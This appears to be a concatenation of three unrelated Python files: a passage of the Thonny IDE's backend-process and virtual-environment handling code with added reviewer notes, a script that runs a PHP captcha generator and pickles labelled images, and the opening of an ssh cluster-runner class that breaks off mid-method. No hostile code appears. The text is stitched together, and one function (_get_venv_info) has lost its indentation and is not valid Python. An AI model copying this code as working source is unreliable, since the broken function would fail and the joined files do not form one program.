            get_workbench().after_cancel(self._polling_after_id)
            self._polling_after_id = None
        self._postponed_commands = []
        if self._proxy:
            self._proxy.destroy()
            self._proxy = None
            get_workbench().event_generate("BackendTerminated")

    def get_local_executable(self) -> Optional[str]:
        if self._proxy is None:
            return None
        else:
            return self._proxy.get_local_executable()

    def get_backend_proxy(self) -> "BackendProxy":
        return self._proxy

    def _check_alloc_console(self) -> None:
        """On Windows GUI builds, attach to a helper process's console so
        interrupts can be sent to the backend."""
        if sys.executable.endswith("thonny.exe") or sys.executable.endswith("pythonw.exe"):
            # These don't have console allocated.
            # Console is required for sending interrupts.
            # AllocConsole would be easier but flashes console window
            import ctypes
            kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
            exe = sys.executable.replace("thonny.exe", "python.exe").replace(
                "pythonw.exe", "python.exe"
            )
            cmd = [exe, "-c", "print('Hi!'); input()"]
            child = subprocess.Popen(
                cmd,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                shell=True,
            )
            child.stdout.readline()
            result = kernel32.AttachConsole(child.pid)
            if not result:
                err = ctypes.get_last_error()
                logging.info("Could not allocate console. Error code: " + str(err))
            # Let the helper's input() return so the child can exit.
            child.stdin.write(b"\n")
            try:
                child.stdin.flush()
            except Exception:
                # May happen eg. when installation path has "&" in it
                # See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
                # Without flush the console window becomes visible, but Thonny can be still used
                logging.getLogger("thonny").exception("Problem with finalizing console allocation")

    def can_do_file_operations(self):
        return self._proxy and self._proxy.can_do_file_operations()

    def get_supported_features(self) -> Set[str]:
        if self._proxy is None:
            return set()
        else:
            return self._proxy.get_supported_features()

    def has_own_filesystem(self):
        if self._proxy is None:
            return False
        else:
            return self._proxy.has_own_filesystem()

    def get_node_label(self):
        if self._proxy is None:
            return "Back-end"
        else:
            return self._proxy.get_node_label()

    def using_venv(self) -> bool:
        return isinstance(self._proxy, CPythonProxy) and self._proxy._in_venv
class BackendProxy:
    """Communicates with backend process.

    All communication methods must be non-blocking,
    ie. suitable for calling from GUI thread."""

    # backend_name will be overwritten on Workbench.add_backend
    # Subclasses don't need to worry about it.
    backend_name = None

    def __init__(self, clean: bool) -> None:
        """Initializes (or starts the initialization of) the backend process.

        Backend is considered ready when the runner gets a ToplevelResponse
        with attribute "welcome_text" from fetch_next_message.
        """

    def send_command(self, cmd: CommandToBackend) -> Optional[str]:
        """Send the command to backend. Return None, 'discard' or 'postpone'"""
        raise NotImplementedError()

    def send_program_input(self, data: str) -> None:
        """Send input data to backend"""
        raise NotImplementedError()

    def fetch_next_message(self):
        """Read next message from the queue or None if queue is empty"""
        raise NotImplementedError()

    def run_script_in_terminal(self, script_path, interactive, keep_open):
        """Execute the script in an external terminal window."""
        raise NotImplementedError()

    def get_sys_path(self):
        "backend's sys.path"
        return []

    def get_backend_name(self):
        # Class attribute, filled in by Workbench.add_backend.
        return type(self).backend_name

    def interrupt(self):
        """Tries to interrupt current command without reseting the backend"""
        pass

    def destroy(self):
        """Called when Thonny no longer needs this instance
        (Thonny gets closed or new backend gets selected)
        """
        pass

    def is_functional(self):
        """Used in MicroPython proxies"""
        return True

    def get_local_executable(self):
        """Return system command for invoking current interpreter"""
        return None

    def get_supported_features(self):
        """Set of feature names; subclasses may add e.g. "debug"."""
        return {"run"}

    def get_node_label(self):
        """Used as files caption if back-end has separate files"""
        return "Back-end"

    def has_own_filesystem(self):
        """True when the backend device keeps its own files (e.g. MicroPython)."""
        return False

    def uses_local_filesystem(self):
        """True when scripts can be referenced by local paths."""
        return True

    def supports_directories(self):
        return True

    def supports_trash(self):
        return True

    def can_do_file_operations(self):
        return False

    def get_cwd(self):
        return None
class SubprocessProxy(BackendProxy):
    """BackendProxy which runs the backend in a separate OS process and talks
    to it over stdin/stdout pipes (one serialized message per line).

    Incoming messages are collected by daemon listener threads into a deque
    which the GUI thread drains via fetch_next_message.
    """

    def __init__(self, clean: bool, executable: str) -> None:
        super().__init__(clean)
        self._executable = executable
        self._response_queue = None
        self._welcome_text = ""
        self._proc = None
        # NOTE(review): duplicate of the assignment three lines above
        self._response_queue = None
        self._sys_path = []
        self._usersitepackages = None
        self._gui_update_loop_id = None
        self._in_venv = None
        self._cwd = self._get_initial_cwd()
        self._start_background_process(clean=clean)

    def _get_initial_cwd(self):
        # Subclasses may override (eg. CPythonProxy uses the workbench's local cwd)
        return None

    def _start_background_process(self, clean=None):
        # deque, because in one occasion I need to put messages back
        self._response_queue = collections.deque()

        # prepare environment
        env = get_environment_for_python_subprocess(self._executable)
        # variables controlling communication with the back-end process
        env["PYTHONIOENCODING"] = "utf-8"

        # because cmd line option -u won't reach child processes
        # see https://github.com/thonny/thonny/issues/808
        env["PYTHONUNBUFFERED"] = "1"

        # Let back-end know about plug-ins
        env["THONNY_USER_DIR"] = THONNY_USER_DIR
        env["THONNY_FRONTEND_SYS_PATH"] = repr(sys.path)

        if get_workbench().in_debug_mode():
            env["THONNY_DEBUG"] = "1"
        elif "THONNY_DEBUG" in env:
            del env["THONNY_DEBUG"]

        if not os.path.exists(self._executable):
            raise UserError(
                "Interpreter (%s) not found. Please recheck corresponding option!"
                % self._executable
            )

        cmd_line = [
            self._executable,
            "-u",  # unbuffered IO
            "-B",  # don't write pyo/pyc files
            # (to avoid problems when using different Python versions without write permissions)
        ] + self._get_launcher_with_args()

        creationflags = 0
        if running_on_windows():
            # new process group allows interrupting via CTRL_BREAK_EVENT (see interrupt())
            creationflags = subprocess.CREATE_NEW_PROCESS_GROUP

        debug("Starting the backend: %s %s", cmd_line, get_workbench().get_local_cwd())
        self._proc = subprocess.Popen(
            cmd_line,
            # bufsize=0,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            cwd=self.get_cwd() if self.uses_local_filesystem() else None,
            env=env,
            universal_newlines=True,
            creationflags=creationflags,
        )

        # setup asynchronous output listeners
        Thread(target=self._listen_stdout, args=(self._proc.stdout,), daemon=True).start()
        Thread(target=self._listen_stderr, args=(self._proc.stderr,), daemon=True).start()

    def _get_launcher_with_args(self):
        # Subclasses supply the script (plus args) which implements the backend
        raise NotImplementedError()

    def send_command(self, cmd: CommandToBackend) -> Optional[str]:
        """Send the command to backend. Return None, 'discard' or 'postpone'"""
        # A frontend-side method named _cmd_<name> intercepts the command
        method_name = "_cmd_" + cmd.name
        if hasattr(self, method_name):
            return getattr(self, method_name)(cmd)

        # Capitalized toplevel commands (eg. "Run") reset the backend state first
        if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
            self._clear_environment()

        self._send_msg(cmd)

    def _send_msg(self, msg):
        # Messages travel over the child's stdin, one serialized message per line
        self._proc.stdin.write(serialize_message(msg) + "\n")
        self._proc.stdin.flush()

    def _clear_environment(self):
        # Subclasses may reset the backend state (eg. restart the process)
        pass

    def send_program_input(self, data):
        """Send input data to backend"""
        self._send_msg(InputSubmission(data))

    def _is_disconnected(self):
        # True when the process was never started, was closed or has exited
        return self._proc is None or self._proc.poll() is not None

    def get_sys_path(self):
        return self._sys_path

    def interrupt(self):
        """Tries to interrupt current command without reseting the backend"""
        if self._proc is not None and self._proc.poll() is None:
            if running_on_windows():
                try:
                    # requires CREATE_NEW_PROCESS_GROUP (see _start_background_process)
                    os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT)  # @UndefinedVariable
                except Exception:
                    logging.exception("Could not interrupt backend process")
            else:
                self._proc.send_signal(signal.SIGINT)

    def destroy(self):
        self._close_backend()

    def _close_backend(self):
        if self._proc is not None and self._proc.poll() is None:
            self._proc.kill()

        self._proc = None
        self._response_queue = None

    def _listen_stdout(self, stdout):
        # debug("... started listening to stdout")
        # will be called from separate thread
        # local reference: _close_backend may null out self._response_queue
        message_queue = self._response_queue

        def publish_as_msg(data):
            msg = parse_message(data)
            if "cwd" in msg:
                # NOTE(review): assigns self.cwd, but the rest of the class
                # uses self._cwd (see _store_state_info) — looks like a typo;
                # confirm before relying on either attribute
                self.cwd = msg["cwd"]
            message_queue.append(msg)

            while len(message_queue) > 100:
                # Probably backend runs an infinite/long print loop.
                # Throttle message thougput in order to keep GUI thread responsive.
                sleep(0.1)

        while not self._is_disconnected():
            data = stdout.readline()
            # debug("... read some stdout data", repr(data))
            if data == "":
                # EOF: the backend closed its stdout
                break
            else:
                try:
                    publish_as_msg(data)
                except Exception:
                    # Can mean the line was from subprocess,
                    # which can't be captured by stream faking.
                    # NB! If subprocess printed it without linebreak,
                    # then the suffix can be thonny message
                    parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)

                    # print first part as it is
                    message_queue.append(
                        BackendEvent("ProgramOutput", data=parts[0], stream_name="stdout")
                    )

                    if len(parts) == 2:
                        second_part = common.MESSAGE_MARKER + parts[1]
                        try:
                            publish_as_msg(second_part)
                        except Exception:
                            # just print ...
                            message_queue.append(
                                BackendEvent(
                                    "ProgramOutput", data=second_part, stream_name="stdout"
                                )
                            )

    def _listen_stderr(self, stderr):
        # stderr is used only for debugger debugging
        while not self._is_disconnected():
            data = stderr.readline()
            if data == "":
                break
            else:
                self._response_queue.append(
                    BackendEvent("ProgramOutput", stream_name="stderr", data=data)
                )

    def _store_state_info(self, msg):
        # Cherry-pick state attributes which the backend includes in its messages
        if "cwd" in msg:
            self._cwd = msg["cwd"]

        if "welcome_text" in msg:
            self._welcome_text = msg["welcome_text"]

        if "in_venv" in msg:
            self._in_venv = msg["in_venv"]

        if "path" in msg:
            self._sys_path = msg["path"]

        if "usersitepackages" in msg:
            self._usersitepackages = msg["usersitepackages"]

        if "prefix" in msg:
            self._sys_prefix = msg["prefix"]

        if "exe_dirs" in msg:
            self._exe_dirs = msg["exe_dirs"]

    def get_supported_features(self):
        return {"run"}

    def get_site_packages(self):
        # NB! site.sitepackages may not be present in virtualenv
        for d in self._sys_path:
            if ("site-packages" in d or "dist-packages" in d) and path_startswith(
                d, self._sys_prefix
            ):
                return d

        return None

    def get_user_site_packages(self):
        return self._usersitepackages

    def get_cwd(self):
        return self._cwd

    def get_exe_dirs(self):
        return self._exe_dirs

    def fetch_next_message(self):
        """Pop the next message from the queue; None when the queue is empty.

        Raises BackendTerminatedError when the queue is empty AND the process
        has died. Consecutive small ProgramOutput messages of the same stream
        are merged into one to reduce pressure on the UI.
        """
        if not self._response_queue or len(self._response_queue) == 0:
            if self._is_disconnected():
                raise BackendTerminatedError(self._proc.returncode if self._proc else None)
            else:
                return None

        msg = self._response_queue.popleft()
        self._store_state_info(msg)

        if msg.event_type == "ProgramOutput":
            # combine available small output messages to one single message,
            # in order to put less pressure on UI code
            while True:
                if len(self._response_queue) == 0:
                    return msg
                else:
                    next_msg = self._response_queue.popleft()
                    if (
                        next_msg.event_type == "ProgramOutput"
                        and next_msg["stream_name"] == msg["stream_name"]
                        and len(msg["data"]) + len(next_msg["data"]) <= OUTPUT_MERGE_THRESHOLD
                        and ("\n" not in msg["data"] or not io_animation_required)
                    ):
                        msg["data"] += next_msg["data"]
                    else:
                        # not same type of message, put it back
                        self._response_queue.appendleft(next_msg)
                        return msg

        else:
            return msg
class CPythonProxy(SubprocessProxy):
    "abstract class"

    def __init__(self, clean: bool, executable: str) -> None:
        super().__init__(clean, executable)
        # Ask the backend to describe itself (cwd, sys.path, venv status, ...)
        self._send_msg(ToplevelCommand("get_environment_info"))

    def _get_initial_cwd(self):
        return get_workbench().get_local_cwd()

    def _get_launcher_with_args(self):
        import thonny.backend_launcher

        # the backend process runs the backend_launcher module as a script
        return [thonny.backend_launcher.__file__]

    def _store_state_info(self, msg):
        super()._store_state_info(msg)
        if "gui_is_active" in msg:
            self._update_gui_updating(msg)

    def _clear_environment(self):
        # restart the process to get a clean interpreter state
        self._close_backend()
        self._start_background_process()

    def _close_backend(self):
        # stop the Tk "after" loop before killing the process
        self._cancel_gui_update_loop()
        super()._close_backend()

    def get_local_executable(self):
        return self._executable

    def _update_gui_updating(self, msg):
        """Enables running Tkinter or Qt programs which doesn't call mainloop.

        When mainloop is omitted, then program can be interacted with
        from the shell after it runs to the end.

        Each ToplevelResponse is supposed to tell, whether gui is active
        and needs updating.
        """
        if not "gui_is_active" in msg:
            return

        if msg["gui_is_active"] and self._gui_update_loop_id is None:
            # Start updating
            self._loop_gui_update(True)
        elif not msg["gui_is_active"] and self._gui_update_loop_id is not None:
            self._cancel_gui_update_loop()

    def _loop_gui_update(self, force=False):
        if force or get_runner().is_waiting_toplevel_command():
            self.send_command(InlineCommand("process_gui_events"))

        # reschedule itself on the Tk event loop (~20 times per second)
        self._gui_update_loop_id = get_workbench().after(50, self._loop_gui_update)

    def _cancel_gui_update_loop(self):
        if self._gui_update_loop_id is not None:
            try:
                get_workbench().after_cancel(self._gui_update_loop_id)
            finally:
                self._gui_update_loop_id = None

    def run_script_in_terminal(self, script_path, args, interactive, keep_open):
        # NOTE(review): has an extra "args" parameter compared to
        # BackendProxy.run_script_in_terminal — confirm all callers pass it
        cmd = [self._executable]
        if interactive:
            cmd.append("-i")
        cmd.append(os.path.basename(script_path))
        cmd.extend(args)

        run_in_terminal(cmd, os.path.dirname(script_path), keep_open=keep_open)

    def get_supported_features(self):
        return {"run", "debug", "run_in_terminal", "pip_gui", "system_shell"}
class PrivateVenvCPythonProxy(CPythonProxy):
    """CPython backend running in a virtual environment private to Thonny."""

    def __init__(self, clean):
        self._prepare_private_venv()
        super().__init__(clean, get_private_venv_executable())

    def _prepare_private_venv(self):
        """Create, regenerate or upgrade the private venv as needed."""
        path = get_private_venv_path()
        if os.path.isdir(path) and os.path.isfile(os.path.join(path, "pyvenv.cfg")):
            self._check_upgrade_private_venv(path)
        else:
            self._create_private_venv(
                path, "Please wait!\nThonny prepares its virtual environment."
            )

    def _check_upgrade_private_venv(self, path):
        # If home is wrong then regenerate
        # If only micro version is different, then upgrade
        info = _get_venv_info(path)

        if not is_same_path(info["home"], os.path.dirname(sys.executable)):
            self._create_private_venv(
                path,
                "Thonny's virtual environment was created for another interpreter.\n"
                + "Regenerating the virtual environment for current interpreter.\n"
                + "(You may need to reinstall your 3rd party packages)\n"
                + "Please wait!.",
                clear=True,
            )
        else:
            venv_version = tuple(map(int, info["version"].split(".")))
            sys_version = sys.version_info[:3]
            # major/minor mismatch should have been caught by the "home" check above
            assert venv_version[0] == sys_version[0]
            assert venv_version[1] == sys_version[1]

            if venv_version[2] != sys_version[2]:
                self._create_private_venv(
                    path, "Please wait!\nUpgrading Thonny's virtual environment.", upgrade=True
                )

    def _create_private_venv(self, path, description, clear=False, upgrade=False):
        """Run ``python -m venv`` in a subprocess while showing a progress dialog."""
        # Don't include system site packages
        # This way all students will have similar configuration
        # independently of system Python (if Thonny is used with system Python)

        # NB! Cant run venv.create directly, because in Windows
        # it tries to link venv to thonny.exe.
        # Need to run it via proper python
        args = ["-m", "venv"]
        if clear:
            args.append("--clear")
        if upgrade:
            args.append("--upgrade")

        try:
            # pylint: disable=unused-variable
            import ensurepip  # @UnusedImport
        except ImportError:
            args.append("--without-pip")

        args.append(path)

        proc = create_frontend_python_process(args)

        from thonny.ui_utils import SubprocessDialog

        dlg = SubprocessDialog(
            get_workbench(), proc, "Preparing the backend", long_description=description
        )
        try:
            ui_utils.show_dialog(dlg)
        except Exception:
            # if using --without-pip the dialog may close very quickly
            # and for some reason wait_window would give error then
            logging.exception("Problem with waiting for venv creation dialog")
        get_workbench().become_active_window()  # Otherwise focus may get stuck somewhere

        bindir = os.path.dirname(get_private_venv_executable())
        # create private env marker
        marker_path = os.path.join(bindir, "is_private")
        with open(marker_path, mode="w") as fp:
            fp.write("# This file marks Thonny-private venv")

        # Create recommended pip conf to get rid of list deprecation warning
        # https://github.com/pypa/pip/issues/4058
        pip_conf = "pip.ini" if running_on_windows() else "pip.conf"
        with open(os.path.join(path, pip_conf), mode="w") as fp:
            fp.write("[list]\nformat = columns")

        assert os.path.isdir(path)
class SameAsFrontendCPythonProxy(CPythonProxy):
    """Backend running with the same Python interpreter as Thonny's GUI."""

    def __init__(self, clean):
        super().__init__(clean, get_frontend_python())

    def fetch_next_message(self):
        """Append an executable hint to the backend's welcome message."""
        msg = super().fetch_next_message()
        if msg and "welcome_text" in msg:
            if is_bundled_python(self._executable):
                suffix = " (bundled)"
            else:
                suffix = " (" + self._executable + ")"
            msg["welcome_text"] += suffix
        return msg
class CustomCPythonProxy(CPythonProxy):
    """Backend running with a user-chosen CPython interpreter."""

    def __init__(self, clean):
        executable = get_workbench().get_option("CustomInterpreter.path")

        # Remember that this non-default interpreter has been used
        used_interpreters = get_workbench().get_option("CustomInterpreter.used_paths")
        if executable not in used_interpreters:
            used_interpreters.append(executable)
            get_workbench().set_option("CustomInterpreter.used_paths", used_interpreters)

        super().__init__(clean, executable)

    def fetch_next_message(self):
        """Append the executable path to the backend's welcome message."""
        msg = super().fetch_next_message()
        if msg and "welcome_text" in msg:
            msg["welcome_text"] = msg["welcome_text"] + " (" + self._executable + ")"
        return msg
def get_private_venv_path():
    """Location of Thonny's private venv, keyed by Python flavor and version."""
    flavor = "BundledPython" if is_bundled_python(sys.executable.lower()) else "Python"
    version_suffix = "%d%d" % (sys.version_info[0], sys.version_info[1])
    return os.path.join(THONNY_USER_DIR, flavor + version_suffix)
def get_private_venv_executable():
    """Full path of the python executable inside Thonny's private venv."""
    venv_path = get_private_venv_path()
    if running_on_windows():
        return os.path.join(venv_path, "Scripts", WINDOWS_EXE)
    return os.path.join(venv_path, "bin", "python3")
def _get_venv_info(venv_path):
cfg_path = os.path.join(venv_path, "pyvenv.cfg")
result = {}
with open(cfg_path, encoding="UTF-8") as fp:
for line in fp:
if "=" in line:
key, val = line.split("=", maxsplit=1)
result[key.strip()] = val.strip()
return result
def is_bundled_python(executable):
    """A Python counts as "bundled with Thonny" when a marker ini file sits
    next to its executable."""
    marker = os.path.join(os.path.dirname(executable), "thonny_python.ini")
    return os.path.exists(marker)
def create_backend_python_process(
    args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
    """Used for running helper commands (eg. pip) on CPython backend.

    Assumes current backend is CPython.
    """
    # TODO: if backend == frontend, then delegate to create_frontend_python_process
    executable = get_runner().get_local_executable()

    env = get_environment_for_python_subprocess(executable)
    # force unbuffered UTF-8 pipes so helper output can be consumed reliably
    env["PYTHONUNBUFFERED"] = "1"
    env["PYTHONIOENCODING"] = "utf-8"

    # TODO: remove frontend python from path and add backend python to it
    return _create_python_process(executable, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
    args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
    """Used for running helper commands (eg. for installing plug-ins on by the plug-ins)

    Fix: the prepared environment (PYTHONIOENCODING/PYTHONUNBUFFERED) was
    computed but never passed to _create_python_process — unlike the
    create_backend_python_process twin — so the overrides were silently
    discarded. Pass it explicitly.
    """
    python_exe = get_frontend_python().replace("pythonw.exe", "python.exe")
    env = get_environment_for_python_subprocess(python_exe)
    env["PYTHONIOENCODING"] = "utf-8"
    env["PYTHONUNBUFFERED"] = "1"
    return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def _create_python_process(
    python_exe,
    args,
    stdin=None,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    shell=False,
    env=None,
    universal_newlines=True,
):
    """Launch *python_exe* with *args*.

    Returns the Popen object with the full command line attached as
    ``proc.cmd`` for later inspection.
    """
    cmd = [python_exe] + args

    popen_kwargs = dict(
        stdin=stdin,
        stdout=stdout,
        stderr=stderr,
        shell=shell,
        env=env,
        universal_newlines=universal_newlines,
    )

    if running_on_windows():
        # new process group enables CTRL_BREAK interrupts; hide the console window
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        popen_kwargs["startupinfo"] = startupinfo
        popen_kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
    else:
        popen_kwargs["startupinfo"] = None
        popen_kwargs["creationflags"] = 0

    proc = subprocess.Popen(cmd, **popen_kwargs)
    proc.cmd = cmd
    return proc
class BackendTerminatedError(Exception):
    """Raised by fetch_next_message when the backend process has died.

    ``returncode`` carries the process exit code, or None when unknown.
    """

    def __init__(self, returncode=None):
        super().__init__()
        self.returncode = returncode
def get_frontend_python():
    """Path of a console-capable python corresponding to the one running Thonny."""
    exe = sys.executable
    for gui_name in ("thonny.exe", "pythonw.exe"):
        exe = exe.replace(gui_name, "python.exe")
    return exe
def is_venv_interpreter_of_current_interpreter(executable):
    """Return True when *executable* belongs to a venv created from the
    interpreter currently running Thonny.

    Looks for ``pyvenv.cfg`` next to the executable or one directory up
    (covers both ``venv/bin/python`` and ``venv/Scripts/python.exe``
    layouts) and compares its ``home`` entry with ``sys.prefix``.

    Fix: the original iterated the literal locations "." and ".." —
    relative to the current working directory — and never used the
    ``executable`` argument at all.
    """
    exe_dir = os.path.dirname(os.path.abspath(executable))
    for location in [exe_dir, os.path.dirname(exe_dir)]:
        cfg_path = os.path.join(location, "pyvenv.cfg")
        if os.path.isfile(cfg_path):
            with open(cfg_path) as fp:
                content = fp.read()

            for line in content.splitlines():
                if line.replace(" ", "").startswith("home="):
                    _, home = line.split("=", maxsplit=1)
                    home = home.strip()
                    if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
                        return True
    return False
def get_environment_for_python_subprocess(target_executable):
    """Compute a complete environment dict suitable for launching *target_executable*."""
    return get_environment_with_overrides(
        get_environment_overrides_for_python_subprocess(target_executable)
    )
def get_environment_with_overrides(overrides):
    """Copy of os.environ with *overrides* applied.

    A None value deletes an existing variable; "PATH" (any case) is merged
    via update_system_path instead of being replaced outright.
    """
    env = os.environ.copy()
    for key, value in overrides.items():
        if value is None and key in env:
            del env[key]
        else:
            assert isinstance(value, str)
            if key.upper() == "PATH":
                update_system_path(env, value)
            else:
                env[key] = value
    return env
def get_environment_overrides_for_python_subprocess(target_executable):
    """Take care of not not confusing different interpreter
    with variables meant for bundled interpreter"""

    # At the moment I'm tweaking the environment only if current
    # exe is bundled for Thonny.
    # In remaining cases it is user's responsibility to avoid
    # calling Thonny with environment which may be confusing for
    # different Pythons called in a subprocess.

    this_executable = sys.executable.replace("pythonw.exe", "python.exe")
    target_executable = target_executable.replace("pythonw.exe", "python.exe")

    interpreter_specific_keys = [
        "TCL_LIBRARY",
        "TK_LIBRARY",
        "LD_LIBRARY_PATH",
        "DYLD_LIBRARY_PATH",
        "SSL_CERT_DIR",
        "SSL_CERT_FILE",
        "PYTHONHOME",
        "PYTHONPATH",
        "PYTHONNOUSERSITE",
        "PYTHONUSERBASE",
    ]

    result = {}

    # NOTE(review): os.path.samefile raises if either path does not exist —
    # presumably both executables exist by the time this is called; verify
    if os.path.samefile(
        target_executable, this_executable
    ) or is_venv_interpreter_of_current_interpreter(target_executable):
        # bring out some important variables so that they can
        # be explicitly set in macOS Terminal
        # (If they are set then it's most likely because current exe is in Thonny bundle)
        for key in interpreter_specific_keys:
            if key in os.environ:
                result[key] = os.environ[key]

        # never pass some variables to different interpreter
        # (even if it's venv or symlink to current one)
        if not is_same_path(target_executable, this_executable):
            for key in ["PYTHONPATH", "PYTHONHOME", "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
                if key in os.environ:
                    result[key] = None
    else:
        # interpreters are not related
        # interpreter specific keys most likely would confuse other interpreter
        for key in interpreter_specific_keys:
            if key in os.environ:
                result[key] = None

    # some keys should be never passed
    for key in [
        "PYTHONSTARTUP",
        "PYTHONBREAKPOINT",
        "PYTHONDEBUG",
        "PYTHONNOUSERSITE",
        "PYTHONASYNCIODEBUG",
    ]:
        if key in os.environ:
            result[key] = None

    # venv may not find (correct) Tk without assistance (eg. in Ubuntu)
    if is_venv_interpreter_of_current_interpreter(target_executable):
        try:
            if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
                result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
                result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
        except Exception:
            logging.exception("Can't compute Tcl/Tk library location")

    return result
def construct_cd_command(path):
    """Build the magic ``%cd`` shell command for changing the backend's directory."""
    normalized = normpath_with_actual_case(path)
    return construct_cmd_line(["%cd", normalized])
# Monotonically increasing, process-wide source for unique command ids
_command_id_counter = 0


def generate_command_id():
    """Return a process-unique command id of the form ``cmd_<n>``."""
    global _command_id_counter
    _command_id_counter += 1
    return "cmd_%d" % _command_id_counter
class BlockingDialog(CommonDialogEx):
    """Modal progress dialog shown while an InlineCommand is being handled.

    Destroys itself when the matching InlineResponse arrives; the Cancel
    button sends an interrupt to the backend.
    """

    def __init__(self, master, cmd, mode="indeterminate"):
        super().__init__(master)
        self.title(_("Working..."))
        self.response = None
        self._sent_interrupt = False
        # Progressbar mode; may switch to "determinate" on first progress event
        self._mode = mode
        # used for matching response/progress events to this dialog
        self._cmd_id = cmd["id"]

        description = cmd.get("description", str(cmd))

        self._description_label = ttk.Label(self.main_frame, text=description)
        self._description_label.grid(row=0, column=0, padx=10, pady=10, sticky="new")

        self._progress_bar = ttk.Progressbar(self.main_frame, mode=self._mode, length=200)
        self._progress_bar.grid(row=1, column=0, padx=10, sticky="new")
        self._progress_bar.start()

        self._cancel_button = ttk.Button(self.main_frame, text=_("Cancel"), command=self._on_cancel)
        self._cancel_button.grid(row=2, column=0, padx=10, pady=10)

        self._start_time = time.time()

        if isinstance(cmd, InlineCommand):
            get_workbench().bind("InlineResponse", self._on_response, True)
            get_workbench().bind("InlineProgress", self._on_progress, True)
        else:
            raise NotImplementedError()

    def _on_response(self, event):
        # NOTE(review): self.response is overwritten even when the event belongs
        # to another command id — confirm this is intentional
        self.response = event
        if event.get("command_id") == self._cmd_id:
            self.destroy()
            if event.get("error") and not event.get("interrupted"):
                messagebox.showerror("Error", event.get("error"))

    def _on_progress(self, event):
        if event.get("command_id") != self._cmd_id:
            return

        if self._mode == "indeterminate":
            # first progress event: switch to a concrete progress display
            self._progress_bar.stop()
            self._mode = "determinate"
            self._progress_bar.configure(mode=self._mode)

        self._progress_bar.configure(maximum=event["maximum"], value=event["value"])

    def _send_interrupt(self):
        self._sent_interrupt = True
        self._description_label.configure(text="Cancelling...")
        self._cancel_button.configure(text=_("Close"))
        get_runner()._cmd_interrupt()

    def on_close(self, event=None):
        # window-manager close button behaves like Cancel
        self._on_cancel()

    def _on_cancel(self):
        if self._sent_interrupt:
            # interrupt already sent: offer to close without waiting for it to finish
            if messagebox.askyesno(
                "Interrupt again?",
                "Do you want to close this dialog without waiting cancelling to complete?",
            ):
                self.destroy()
            else:
                self._send_interrupt()
        else:
            if messagebox.askyesno(
                "Cancel current operation?", "Do you really want to cancel this operation?"
            ):
                self._send_interrupt()
|
gen.py | import re
import subprocess
import threading
from io import BytesIO
from math import ceil
from os import listdir, path
from sys import argv
import pandas as pd
from numpy import array
from PIL import Image
DATA_DIR = "data"
def run(num, wid, ims):
    """Worker: ask the PHP generator for *num* captcha images and collect
    (label, pixel-array) tuples into *ims* (mutated in place).

    Per-image wire format read from the PHP process' stdout — presumably:
      2 bytes  image byte length (s[0]*256 + s[1])
      4 bytes  the label text (utf-8)
      l bytes  the image file contents
    TODO confirm against gen.php.

    NOTE(review): shell=True with a formatted command — safe only while
    *num* stays an int.
    """
    p = subprocess.Popen(
        "php gen.php {}".format(num),
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        shell=True,
    )
    for i in range(num):
        if i % 1024 == 0:
            # progress logging per 1024 images
            print(f"Worker{wid}: Generated{i}")
        s = p.stdout.read(2)  # image-size prefix
        ph = str(p.stdout.read(4), encoding="utf-8")  # 4-char label
        l = s[0] * 256 + s[1]
        # decode image bytes to a numpy array
        d = array(Image.open(BytesIO(p.stdout.read(l))))
        ims.append((ph, d))
def generate(num, workers, batch_size):
    """Generate *num* images using *workers* threads and pickle them into
    DATA_DIR in chunks of *batch_size* rows.

    Output file names continue from the highest existing ``data-<n>.pkl``
    index, so repeated runs accumulate data instead of overwriting it.
    """
    each = num // workers
    ims = [[] for i in range(workers)]
    tasks = []
    # first workers-1 threads produce `each` images; the last takes the remainder
    for i in range(workers - 1):
        tasks.append(threading.Thread(target=run, args=(each, i, ims[i])))
    tasks.append(
        threading.Thread(
            target=run, args=(num - each * (workers - 1), workers - 1, ims[-1])
        )
    )
    for thread in tasks:
        thread.start()
    for thread in tasks:
        thread.join()
    # flatten per-worker result lists into a single DataFrame
    df = pd.DataFrame([j for i in ims for j in i], columns=["label", "image"])
    # highest index already present in DATA_DIR; -1 when no file matches
    offset = max(
        [
            int((re.match(r"data-([0-9]+)\.pkl", f) or [None, -1])[1])
            for f in listdir(DATA_DIR)
        ]
        or [-1]
    )
    for i in range(ceil(len(df) / batch_size)):
        df.iloc[i * batch_size : (i + 1) * batch_size].to_pickle(
            path.join(DATA_DIR, f"data-{i + offset + 1}.pkl")
        )
if __name__ == "__main__":
    # CLI usage: gen.py <num> <workers> <batch_size>
    generate(*map(int, argv[1:]))
|
parallel.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 12 00:23:36 2018
@author: yuluo
"""
import multiprocessing as mp
import os
import random
import subprocess
from deprecated.deprecated import ProcessABC
class ParallelProcess(ProcessABC):
    """Runs shell scripts on remote computers of a configured cluster over
    ssh, optionally several scripts in parallel (one OS process per script).

    *content* is the parsed cloudmesh configuration dict.
    """

    def __init__(self, content):
        self.content = content

    def get_computer_list(self):
        # the configured cluster: mapping of computer id -> description dict
        return (self.content["cloudmesh"])["cluster"]

    def get_computer(self, info):
        """Pick a computer from the cluster.

        With truthy *info* select by label or name; otherwise pick one at
        random. Returns (id, username, publickey) — empty strings when no
        match was found.
        """
        item = ""
        username = ""
        publickey = ""
